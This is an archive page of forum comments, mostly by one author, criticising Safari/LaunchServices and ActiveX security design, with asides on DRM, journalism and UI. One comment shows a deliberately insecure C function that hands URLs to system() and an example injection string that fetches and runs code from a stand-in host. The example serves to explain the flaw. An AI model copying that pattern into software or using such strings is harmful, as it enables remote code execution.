Domain: scarydevil.com
Stories and comments across the archive that link to scarydevil.com.
Comments · 106
-
Depends on the HR dept
...and by extension, the size and composition of the firms that notice you.
There's no way to predict; I agree with those who say you'll master the curriculum, but of what use is it in the real world? I picked a company that preached Software Methodology, vs. the ones who wanted a truck routing system written in COBOL, all of their PL/I code converted to COBOL, or custom-built software for their airport parking garage with no specifications in sight. I relocated, scored very above-average pay, only to find that Ferranti International Controls Corporation played at Software Engineering. Any code review might feature the VP of Engineering, who was a pompous know-it-all who'd apparently never heard about leaving one's ego at the door. It would have been Hell, except that I caught a break and was tapped to fill a sudden opening on the UNIX Systems Support team, circa 1987. On top of that bonus, I got to work alongside Peter da Silva and Karl Lehenbauer, both of whom I still count as close friends. BTW, Peter and Karl were both dropouts; Peter makes quite the comfortable living, and Karl's a millionaire.
Go with your instincts, they're 100% correct. It's your conscious mind that'll steer you astray--or keep you standing still, wondering what to do. I presume that you're still young enough to recover from a mistake. -
Re:Safari or Windows vuls?
OS X has the same problem.
http://www.scarydevil.com/~peter/io/osx-security.html
(and several other notes on http://www.scarydevil.com/~peter/io/ )
As I noted in my comment on larholm.com, this is a long running design flaw in both ahem-mainstream-ahem operating systems. It's really not safe for any browser or other application to trust LaunchServices *or* Windows protocol handler database. The handlers that are suitable for a desktop environment are not generally the ones you want to use from untrusted documents. -
I notice they're not applying their usual filters.
As I wrote a few years ago in A Failure of Vision the filtering that NASA has been doing to accurately recreate the actual colors of Mars's surface actually makes it harder to tell what you're looking at. If you were living and working on Mars, before long your eyes and brain would adapt and you wouldn't see the red planet as particularly red.
If you go and adjust the ground to the rusty red in NASA's usual photos with this new photograph the water doesn't look nearly so watery any more. But when I lined up the peaks in the red, green, and blue channels to try and get an approximation of the original image (only an approximation, of course... but this has produced realistic looking images for me in the past... reddish, yes, but a red like you might see in Arizona) I got this picture of what appears to be normal-looking (not food-coloring-blue) water.
So my question is... what else have people missed, because they're seeing Mars through Earth-filtered images?
Maybe if a few folks out there tried this trick on other NASA imagery we'd find out. -
What about paper ballots.
I don't see anything in the review draft or FAQ about voter-confirmable human-readable records (paper ballots, tapes, or other human-readable media). If there is a printed human-countable ballot that the voter can visually confirm was correct and saved, then the possibility of electronic fraud is minimized.
-
Re:Nice Suttle FUD in the article.
Delirant isti Romani!
http://www.scarydevil.com/~peter/mirrors/Asterix/romans.html :-) -
Re:Story at 11
The problem here is that it's almost impossible to avoid using Internet Explorer.
It's a LOT easier now than it was when the alternative was Netscape 4, friend. Don't "lock it down tight", just don't use it at all until you actually need to for something that matters (that would be 'you can't get to your bank account without it'... not 'Youtube is screwing up with Firefox').
Of course, as soon as someone finds an attack vector usable with Apple Events, OS X will be the Emperor's new OS.
Indeed. I am not at all happy that Safari accepts applescript://com.apple.scripteditor without a dialog, but I have been aware of this issue for a while. :) -
Slashdotters know something about technology.
What's special about technology is that this is Slashdot and most of us understand technology. If this were an audience that had the same common level of understanding of the politics of the Middle East, or Japanese Martial Arts, we'd be complaining about how reporters covered them instead.
This reminds me of something I wrote in 1998 after Harlan Ellison announced that there was something particularly broken about journalism on the Internet.
I used to be a big fan of newspaper reporters. Jimmy Olsen was my hero. In contrast to television crews, newspaper and magazine journalists seemed to have the opportunity to spend the time necessary to get the facts straight; they didn't have to take a complex subject and trim it down to a thirty second sound bite.
But you know, as time went on and I got closer to the heart of some of these stories, I found that the more I knew about the facts the less accurate the stories seemed. That made me wonder, how close to reality were the rest of the stories, the ones I didn't know anything about?
-- Harlan Ellison versus the Crazy Yenta Gossip Line -
My dream user interface...
... couldn't fit on a web page, except maybe using VRML.
http://scarydevil.com/~peter/io/3dworld.html -
And how is this Apple's fault?
But Apple is the company that's been placed on a pedestal by its fanbase and the mainstream media as an enlightened, progressive, cool, hip company, above reproach, and Apple has only played into that.
If Apple was a person "its fanbase and the mainstream media" would be up on charges for stalking.
I get regularly modded down here for pointing at problems like Apple's daft approach to security in Safari. If you want to get on Apple's case for something they can and should do something about, start there. -
Re:What rights am I giving up?
I haven't read the iTMS EULA, but it's probably the case that burning a song to CD and then ripping the resulting CD is not allowed by it.
The EULA can't override traditional fair use.
Besides, is this really the process that you want to go through in order to make a personal backup copy of your music? Is this what you would expect the average consumer to go through?
Absolutely. When even "honor system" DRM makes users jump through hoops like this to do normal and expected operations, that makes DRM as a whole look bad. Which is good.
Apple is the largest single purveyor of DRM so we started there.
Sony's bigger.
Microsoft's bigger AND more dangerous.
Blockbuster's bigger.
Apple is small potatoes.
Read my response in more detail, paying particular care to the reasons why Apple's clunky, incompetent, incomplete, and inconvenient DRM is good for the consumer. -
Re:BPI Wants FairPlay Opened Up?
Why on Earth would the music industry want Apple to licence FairPlay?
Because a balkanized DRM "marketplace" is good for consumers, and bad for the Intellectual Property Misers that run the labels. So since Apple's not caving in to Microsoft they want to see Apple "win" in the DRM wars. Luckily, Apple doesn't want to "win", because they know the only way to win is not to play.
I wish Sony's DRM and Real's DRM were still seriously fighting it out with Microsoft's Trusted Computing software.
But I'll take what I can get. -
Addenda...
Expanded on this comment here.
Also noted some of the major inaccuracies in the original article.
I get the feeling that these folks are less concerned about DRM and more concerned about their own convenience. -
What About Design Flaws, Luke?
It's no secret that all software has bugs and vulnerabilities - and like other software companies, we are committed to building software as secure as we can make it and finding and fixing bugs as quickly as possible.
You've had almost 10 years to fix the fundamental design flaw that's by far the biggest source of security problems - the integration of the Browser and the Desktop using ActiveX - and not only has Microsoft NOT backed out that unfixable problem and the layers of kludges (like "security zones") plastered over it, Microsoft risked getting the company torn apart by the DoJ to keep that design in place.
Nobody else has anything like that. Even the dumbest things Apple has done, like Open "Safe" Files After Downloading, are miles less daft.
When's Microsoft going to seriously address this? -
Re:Disable automatic execution even with a dialog.
Disable automatic execution even with a dialog.
Absolutely. So simple, and yet so little-known.
Firefox: get rid of the XPI install-from-web stuff.
What in the world is that? Presumably there's a good way to disable it?
(don't treat archives as "safe files",
Yeah. Sheesh.
(in fact there's a lot of ranting I could add here: http://www.scarydevil.com/~peter/io/rant.html
Say! Nice rant.
Apple: Don't "open safe files after downloading"... there are no "safe files".
Well, data files are a lot safer than executable files, but that line just keeps getting blurrier (as witness yesterday's story).
-
Disable automatic execution even with a dialog.
In my 20 years of system administration I have often had people come to me and say "Peter, I just clicked the wrong button and my computer's acting funny." I've less often had people say "Peter, I downloaded a file to the desktop and opened it and my computer's acting funny." I've had several people say "Peter, I just clicked the wrong button AGAIN and I think I'm infected."
I've never had the same person come to me twice with "I've downloaded and opened a file and I'm infected." Give people even a small breathing space to think about what they're doing, without that reflex "gotta push a button" effect, and social engineering is MUCH harder.
So...
You can solve this for most people simply by not including a mechanism for running untrusted content. Don't pop up a dialog box asking "What do you want to do with this application you just downloaded? (Open) (Show) (Ignore)". Don't even ask "The file you just asked to open is an application? (Infect Me) (Cancel)". Just don't put the user in the position of deciding, right then, what to do with the file. Ever.
Firefox: get rid of the XPI install-from-web stuff. Let the user download the XPI and open it explicitly.
Apple: Don't "open safe files after downloading"... there are no "safe files".
Microsoft: get rid of ActiveX and security zones and for god's sake don't try and make .NET-in-the-browser into the next Active Desktop disaster.
All of the above: If it's a file you've got a safe application for... a *safe application*, not a *safe file*... open it explicitly IN THAT APPLICATION. Don't go "this is a ZIP file so I'll open it in whatever random program the user has for opening archives". Keep a database of safe programs to use on untrusted content like you keep a database of plugins people have explicitly installed. This would resolve SO MANY security issues... damnit.
(don't treat archives as "safe files", but that's another rant)
(in fact there's a lot of ranting I could add here...) -
Sometimes you can have features and security!
It's not so easy, removing features, even if they are unsafe.
I know, that's why my recommendation doesn't remove any user-visible features, and even improves the user experience by removing the perceived need for warning dialogs before doing "unsafe" things, and provides a more versatile and flexible tool for managing the whole process.
It would, as far as the user's concerned, add features. And improve security as well. -
Who are "these people"?
people never tend to pick on Apple anyway
ORLY?
The worst of Apple's bugs tend to be at the "You know, you really ought to wash your hands after using a public restroom" level.
Microsoft's are more at the "You know, you probably ought to wear protection when having anonymous sex in public restrooms" level.
The whole idea of a web page being able to download and execute code outside the sandbox is just so horribly alien to any kind of sane security model that I'm still boggled at it. And doubly boggled that someone at Microsoft hasn't gone to jail for it yet. -
Re:Give me REAL WORLD proof
but the holes get FIXED and not denied for months until the hole is used to destroy hundreds of thousands of PCs.
Safari still has "Open Safe Files after Downloading", still uses Launchservices to find the loader for safe files, and still treats installers and archives as "safe files".
This is a flaw that's been left unfixed for two years. This isn't as bad as Microsoft leaving ActiveX around for 10, but still... -
MACs are more secure, Apple's trying to fix that
One reason *everyone* is more secure than Microsoft Windows is that only Windows has implemented anything even vaguely as bad as the ActiveX/Windows Desktop/IE integration mess.
On the other hand, just about everyone to some degree or another commits the sin of trusting untrustable files. Even the darling of the security set, Firefox, has an installation mechanism that involves executing files directly from the Internet without a user's explicit request.
Apple has "Open safe files after downloading" compounded by the unforgivable sin of treating things like archivers or installers as "safe" files.
I've written about this before.
On a security level, this is like shaking hands after sneezing, compared to Microsoft's fascination with running barefoot through a "Hot Ward" and snogging the Ebola patients, but it's still unacceptable. -
Re:Excuse me, but... huh?
Wasn't there a recent spate of OS X exploits, including a virus or trojan of some sort?
There is no such thing as a "safe" file. -
No, it's not the x86, it's Safari & LaunchServ
It's not the x86, it's Safari and Launchservices.
Stupid beggars. Microsoft proved that trick never works in 1998. -
Re:Anti-malware would be better.
Apple has already put badly thought out "anti-malware" components in OS X, and they have already failed to detect malware and caused more problems from false positives than they prevent. Until there are enough exploits in the wild that the risk of not running anti-malware is clearly higher than the risks of running it, it's crazy to run it.
And that's where we've been at for two years. I brought this up in MAY 2004, June 2004 and January 2005, and in May 2005, as well as numerous times since then.
Apple would be coding this, not Symantec or some third party.
I don't care if Ken Thompson and Dennis Ritchie and the ghost of Alan Turing were coding it, the whole purpose of "anti-malware" code is to detect "suspicious" patterns of activity and block them. It inherently creates a certain amount of false positives, and even the minimal "anti-malware" Apple has already put in OS X has managed to lock me up so I had to ssh in and kill a screen saver that it had decided was doing something suspicious (as noted in the January note above).
Security is about protection, not Convenience.
Security is about defense in depth. Windows has to depend on anti-malware and obtrusive firewall rules because it has so many holes in the system that these "last ditch" defenses are all it can manage. It's possible to design a system that's more convenient and secure by using the right approach.
Such as what's listed at http://www.thexlab.com/faqs/malspyware.html?
Of which the only one found in the wild is a social-engineering attack. Anti-malware can't prevent a social-engineering attack (install this, unpack this and run that, trust us). It can't prevent DRM software being installed even if that DRM software is doing dangerous things, because that's what DRM software is all about (and I've got a fine selection of rants about that if you'd like to hear them)... -
This is Apple's fault.
Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X.
Yes, it bloody well can.
A key part of this attack should have been closed almost two years ago but Apple 'fixed' the wrong thing.
And they know there's a problem with LaunchServices, because in Tiger they allow you to override the types of files Safari considers "safe"... unfortunately they still use the LaunchServices database, which leaves the "injection" problem intact.
So... Apple can fix these problems. Secure approaches are well known, and have been known for longer than Apple has existed as a company, and they know the problems exist. Why do they leave this hole open? I don't know, possibly because Microsoft does? -
This is an OS vulnerability.
there are OS vulnerabilities and application vulnerabilities.
And this is an OS vulnerability. On Mac OS X, LaunchServices is an OS component. It's the normal way to launch GUI applications, including helper applications from web browsers, like the shell in UNIX is the normal way to run command line applications. In UNIX, though, applications that have security concerns don't (or shouldn't ... you do see apps breaking this rule from time to time) call the shell to run applications... they fork() and exec() the desired application directly... because the shell's behaviour isn't controllable or fully predictable.
LaunchServices has many of the same problems. UNFORTUNATELY, there's no general "safe" way to open documents on OS X. It's possible to securely open applications if you know the right application, but it's more complex than just fork/exec, and you have to deal with the difference between old-style Carbon apps and Cocoa appdirs... so Safari and other programs use LaunchServices.
The lack of a "secure applications only" equivalent to LaunchServices is an OS vulnerability. One that must be fixed (alas, Apple didn't fix it the last two times around). -
Re:No vectors for attack
Mac OS X has no vectors for attack except social engineering.
And LaunchServices. -
Pity Apple hasn't been paying more attention...
Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
It's a pity Apple hasn't been paying more attention.
Two years ago, Apple got bit by Safari's blind trust of LaunchServices, at the same time Microsoft got hit by a hole in almost the same application on Windows. Instead of going "oh, maybe Safari shouldn't use the same database for finding helpers as desktop applications do", they went "oh, maybe the helper app database should try and guess if it's being used by an exploit".
That's the same kind of decision Microsoft made in the '90s when they came up with "Active Content" and "Security Zones", and it didn't work for them then. Microsoft isn't likely to back out of that, but, damn, Apple should have noticed what a big blunder that was.
At least they should have backed out of it the first time it came up. -
Bah, Humbug, Bad Link...
-
Old security hole, shared by Windows & Firefox
Among the signs: two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack.
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    /* Deliberately insecure: the URL is handed to the shell as part of a command line. */
    void run_application_on_url(char *app, char *url)
    {
        char *buffer = malloc(strlen(app) + strlen(url) + 6);   /* room for space, quotes, " &" and NUL */
        if (!buffer) { fprintf(stderr, "Out of memory on malloc\n"); exit(1); }   /* original tested !*buffer, a typo */
        sprintf(buffer, "%s \"%s\" &", app, url);
        system(buffer);   /* the shell, not the program, decides what the URL means */
        free(buffer);
    }
That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http://badguy.xx/exploitcode>/tmp/...;sh /tmp/..." .
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files. -
Be Paranoid, but not for this reason.
I recommend preventing the whole class of exploits by turning off "Open Safe Files", installing Stuffit Expander (but turning off "Mount disk images" in there) and not worrying about "Watch non-default application launches".
But turning "Watch URI schemes" on is worth considering, because Apple's solution doesn't actually prevent the exploit that led to its creation. -
This has nothing to do with X86
This is a new instance of an old and well known security hole in the way Apple uses LaunchServices for untrusted content that I have been talking about for years. The underlying flaw (the idea that "files" rather than the applications that open them need to be "safe") has been exploited before, and will be exploited again if Apple merely fixes this particular instance.
My comment on this from May 2004, getting on for two years ago now.
Microsoft has been in denial about their own (and much nastier and harder to fix without breaking existing code) problem in their browser for almost 10 years now, I hope Apple is smarter. -
DO NOT DO THIS
This will disable any applications that use Terminal.app to run shell scripts (which includes some installers, and a number of utility programs and menu extras), and will not prevent the attack. Terminal.app is not the only application that can be used to launch an unrestricted script.
The two things you should do are:
1. Use Stuffit expander or some other application that doesn't support the __MACOSX hack as your handler for ZIP files, instead of BOMArchiver. This will prevent this attack in any application (including Mail.app and Finder).
2. Disable "Open Safe Files After Downloading" in Safari.
3. Don't open attachments in Mail.app, save them to disk and examine them. Also, don't follow links directly from Mail.app, copy them somewhere first to make sure you're not being phished. Mail.app's handling of untrusted content is pretty skanky in general.
4. Contact Apple and ask them to provide a "Safe Applications" equivalent of LaunchServices that programs like Safari, Firefox, and other programs that have reason to pass untrusted documents to sandboxed applications can use. I have been calling for this for at least a year and a half, every time "Open Safe Files" and other interfaces that use LaunchServices for untrusted documents leads to a security hole, and every time Apple has simply applied another patch that handles one possible attack.
That's what Microsoft has been doing for *their* horrendous security holes in the HTML control since 1997, and they STILL haven't gotten it to work.
It's not possible to find and track all the new holes (this one was opened up by switching from Stuffit Expander to BOMArchiver for zip files, for example), and patching the holes by finding the 'last responsible application' and restricting that only makes the system less reliable and convenient to use... and leaves the fundamental security hole unplugged.
An older post on the same topic. -
There are bigger problems with OSX
There are bigger problems in OSX. Auto-installing Dashboard widgets was stupid, and "Open Safe Files After Downloading" (a silly name for "Open Potentially Unsafe Files After Downloading") is an unnecessary risk only minimally mitigated by adding warning dialogs... but at least you can turn it off. More details in these comments:
http://www.scarydevil.com/~peter/io/osx-security.html
http://www.scarydevil.com/~peter/io/apple.html
http://www.scarydevil.com/~peter/io/apple2.html
Thankfully even these are not as easily exploited as Microsoft's poisoned gumbo of IE, Outlook, ActiveX, and Security Zones... but Apple really needs to take a good look at the way they approach the Internet, and quit being so trusting. -
Re:Please, no!
I don't know about "compatible" control keys, but I'd like more consistency in the command keys, and less dependence on click-key combos. I'd also like to be able to disable "click-and-hold" and "control-click" and force all applications to just use right-click when a multi-button mouse is available.
Definitely agree on the scroll mice.
Finally, the appropriate solution would be to give the user the choice of setting up the toolbar (like Mail.app) with every possible leaf in the menu-tree. Why bicker about "save", when all the leaves in the menu should be allowable targets for the user to put into the toolbar?
Oh yes, I'd also like to be able to add any of these leaves to the contextual menu, too... in fact the toolbar configuration should be expanded to allow you to put any menu item, toolbar icon, or service into either the toolbar or the contextual menu. INCLUDING putting the whole menu in there if I want, so I don't have to go back to the top of the screen all the time.
(and before people start going on about Fitts Law, remember that there's five Fitts Law best-targets on the screen, and one is "where the mouse is")
Perhaps a mechanism to allow for user-specified sort routines, so the user can choose however they want.
Hell yes. And not just in Finder windows, let me sort by date in file open dialogs as well. Or better yet, give me a button in the file open dialog that'll open the corresponding Finder window and turn the dialog into a drag target.
The one feature that Microsoft Windows used to have (I haven't checked recently) is the ability to maneuver around the system without a mouse. I'm not talking about a gazillion shortcut keys, but rather the ability to actually Get Work Done when you have no mouse at all hooked up to the system (or the mouse is buried under a pile of paper and you just need to quickly do some otherwise GUI-based task).
They screwed it up a bit in Windows 9x with the task bar, but mostly this capability is still intact. The one big problem is that you can't cursor into most toolbars any more, you're expected to use the menus for the corresponding actions... and this has become a problem because some applications no longer have menu actions for all toolbar actions.
Turning on Universal Keyboard Access helps some, but it's still nowhere near complete.
I'd be happy enough with the Amiga solution (Amiga-Arrow keys would move the mouse pointer, and Amiga-Return would send a mouse-click),
You already have this, pretty much. You can turn mouse keys on in Universal Access, and it sucks. It's NOT a viable alternative to Windows keyboard control. -
Re:OS 7.5? Give me a break.
Give me a few and I'm pretty sure I could find others.
Please do. I'm honestly interested, I've been looking for one for a couple of years now.
I'm not an Apple apologist, nor would I ever say you're perfectly safe just because they haven't been exploited yet, or even because the system design is inherently safer than the Windows desktop. But the fact remains that it is a better design (it could hardly be worse), and they haven't been subject to spyware or viruses... I think Apple has taken some unfortunate actions with Safari that have the potential of eventually changing the situation for the worse. But right now there are no cases of live viruses or spyware for OS X, and I can't see a credible avenue of attack that would be more effective than plain old social engineering.
Social engineering is a problem, but it's a manageable one. You can learn not to be "phished"*.
Turn off "open safe files" in Safari (or, better, use Camino** instead) and don't be phishable: don't open email attachments unless you are expecting them, don't download and run random garbage, and don't trust URLs you get in email. You'll be as close to safe as you can be on any platform, and safer than you would be running Windows even if you run a firewall, a sniffer, antivirus, antispyware, and don't run ANY Microsoft-provided internet or Mail apps.
* I know that this term originated with people stealing passwords, credit card numbers, and other personal info... but the same kinds of social engineering attacks are used by viruses.
** I trust Camino more than Firefox. Mozilla's pluggable extension mechanism is better than Microsoft's ActiveX, but it's still an unnecessary risk. Once Flashblock came to Camino I quit using Firefox. -
Here you go...
My Open Letter to Apple about the biggest security flaw they've left hanging. It's purely a theoretical problem so far.
-
Interesting desktop background...
That desktop background looks quite evocative.
-
Re:In in!
However any dashboard that doesn't have cocoa or applescript parts will all run in Safari without any alteration (that I know of).
That's one thing I'd like to get more information about, actually. How exactly are they extending webcore and how much have they opened up for Safari. I'm worried that they're copying Microsoft's greatest mistake. -
Re:Useful phrases for space tourists.
There is going to be a waiter in space?
If Space Tourism gets off the ground, there's going to be waiters and busboys and skycaps and the annoying guy who wants a tip because he touched your bags when you carried them into the hotel.
Useful Phrases for the Space Tourist, in many languages. -
Poor man hasn't heard of Sturgeon's Law
The poor man has probably never had to watch sausage being made before, and is unfamiliar with Sturgeon's Law.
-
Re:Um, it's Cory Doctorow
The OP's point is that with just a little bit of critical thinking you can see that there isn't any factual information to link the BBC story to something some unnamed individual said on a mailing list.
The OP made several points. The one I'm objecting to is that the fact that this was on a humorously named website had anything to do with its credibility.
I expect for my news to have really happened.
That would be in some alternate universe, then? Or do you think the fact that we can see the sausage being made means that it's being made any differently than it was in the past? -
Re:Asymptotic
-
Exposé and its children...
GPUs are good enough that a realtime 3d window manager is possible. It's a much simpler problem than FMV, and Apple's beginning to play with some of the features in Quartz Extreme and Exposé, but until someone actually produces something like my fantasy 3dWM we won't see much demand for it.
-
It's all a "Crazy Yenta Gossip Line".
Err...
"If you're one of those people who thinks that the US mainstream press doesn't report "the truth" and is completely "in the pocket" of corporations and/or government, then you're already part of the problem."
I call shenanigans!
This is a classic "straw man": proposing an obvious and easily refuted falsehood and representing it as the opposing argument, refuting it, and claiming that you have thereby disproved the opposing argument.
It doesn't matter, then, whether the conspiracy theory you're invoking is true or false, logical or ludicrous, because it has nothing to do with the point our Anonymous Coward was making.
He didn't argue "the US mainstream press [...] is completely "in the pocket" of corporations and/or government", he implied that the US press promoted "a bunch of untrue gossip and sensationalist trivia".
And he's absolutely right. What Harlan Ellison denigrates as the Crazy Yenta Gossip Line may be full of "a bunch of untrue gossip and sensationalist trivia", but at least it has feedback mechanisms that let you find out when it's accelerating towards the crackpot event horizon. The mainstream press claims to, but oddly enough when I know what's really behind the stories I'm amazed how obviously wrong they are. -
Re:My hero!
Tcl is great for throwing these things together, and Tk one of the more platform-independent GUI frameworks. That script should run the same on Windows, Mac OS X under native Aqua or X11, or on any other X11/Unix combo.
And it's not a lot of code.
Have a look at something I created as a display tool for sticking on the end of a pipeline that's twiddling password-style files: viewdb.